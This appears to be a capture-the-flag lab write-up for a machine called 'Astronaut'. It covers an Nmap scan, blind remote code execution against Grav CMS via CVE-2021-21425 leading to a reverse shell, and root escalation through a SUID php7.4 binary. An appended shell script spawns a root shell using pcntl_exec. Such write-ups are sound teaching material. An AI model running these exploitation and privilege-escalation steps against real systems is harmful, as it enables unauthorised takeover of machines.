Astronaut
Nmap Scan
$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.199.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 13:50 +08
Nmap scan report for 192.168.199.12
Host is up (0.0072s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
| 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Index of /
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-03-17 17:46 grav-admin/
|_
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds
Initial Access
Port 80
When we browse to port 80, we are greeted with an Apache directory listing that exposes a single directory, grav-admin/.

Clicking into it shows that the site is running Grav CMS.

CVE-2021-21425
Searching online for known exploits turns up CVE-2021-21425, an unauthenticated vulnerability in the Grav admin plugin that results in RCE.
Running the public exploit once appears to do nothing: no command output comes back.

However, if we make the injected command ping back to our own machine, the ICMP packets arrive. The command does execute; we simply do not see its output, so this is blind RCE.


So we swap in a reverse shell payload instead, with a listener waiting on our machine, and catch the shell.

Privilege Escalation
php SUID
php7.4 has the SUID bit set and is owned by root. Any user who runs it therefore gets root's effective UID for the duration of the process, and whatever php is told to execute runs as root.
php is one of the binaries documented (for example on GTFOBins) as giving a root shell when it is SUID, because it can exec another program while keeping the elevated effective UID.
Following that technique gives us a root shell.
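The enumeration and escalation steps above, as an added example that is not part of the original write-up. It assumes the binary sits at /usr/bin/php7.4 (the path is an assumption; find it with `list_suid` first) and uses the standard pcntl_exec trick for a SUID php, which needs the pcntl extension that the Ubuntu CLI build includes.

```sh
#!/bin/sh
# Added example (not from the original write-up): find SUID binaries,
# confirm one really is root-owned SUID, then abuse a SUID php.
# /usr/bin/php7.4 below is an assumed path.

# List every SUID file on the box; this is how php7.4 turns up in the first place.
list_suid() {
  find / -perm -4000 -type f 2>/dev/null
}

# Classify a single path:
#   suid-root   SUID bit set and owned by root  -> runs with euid 0
#   suid-other  SUID bit set but not root-owned -> runs as that owner, not root
#   no-suid     SUID bit not set
#   missing     path does not exist
classify_suid() {
  path=$1
  [ -e "$path" ] || { echo "missing"; return 1; }
  if [ -u "$path" ]; then
    owner=$(ls -ld "$path" | awk '{print $3}')
    if [ "$owner" = "root" ]; then
      echo "suid-root"
    else
      echo "suid-other"
    fi
  else
    echo "no-suid"
  fi
}

# Spawn a root shell through a SUID php. pcntl_exec replaces the php process
# with /bin/sh; the -p flag tells sh to keep the elevated effective UID instead
# of dropping back to the real UID (without -p you get a shell as yourself).
php_suid_shell() {
  php=${1:-/usr/bin/php7.4}
  [ "$(classify_suid "$php")" = "suid-root" ] || {
    echo "$php is not a root-owned SUID binary" >&2
    return 1
  }
  "$php" -r "pcntl_exec('/bin/sh', ['-p']);"
}

# On the target (not executed here):
#   list_suid                          # look for /usr/bin/php7.4 in the output
#   classify_suid /usr/bin/php7.4      # expect: suid-root
#   php_suid_shell /usr/bin/php7.4     # then `id` should show euid=0(root)
```

If `id` afterwards shows `uid=1000(...) euid=0(root)` rather than a plain root uid, that is expected: the process is still the low-privileged real user with a root effective UID, which is enough to read root-only files and spawn further root processes.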
